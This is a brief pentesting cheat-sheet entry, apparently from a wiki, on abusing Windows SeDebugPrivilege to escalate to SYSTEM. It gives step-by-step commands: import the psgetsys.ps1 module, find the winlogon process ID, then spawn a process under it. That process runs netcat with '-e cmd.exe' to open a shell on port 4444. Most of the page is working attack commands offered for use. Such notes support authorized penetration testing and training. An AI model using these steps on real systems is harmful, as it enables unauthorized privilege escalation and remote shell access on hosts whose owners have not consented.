SeDebugPrivilege

Most powerful privilege you can get. Easy system shell

You can update update proc attribute list with this privilege and can elevate privileges.

Use the module below to do that.

import-module .\psgetsys.ps1

Find pid of a process that is privileged.

Get-Process winlogon

Use that pid to attach & execute commands

[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")

Last updated 4 years ago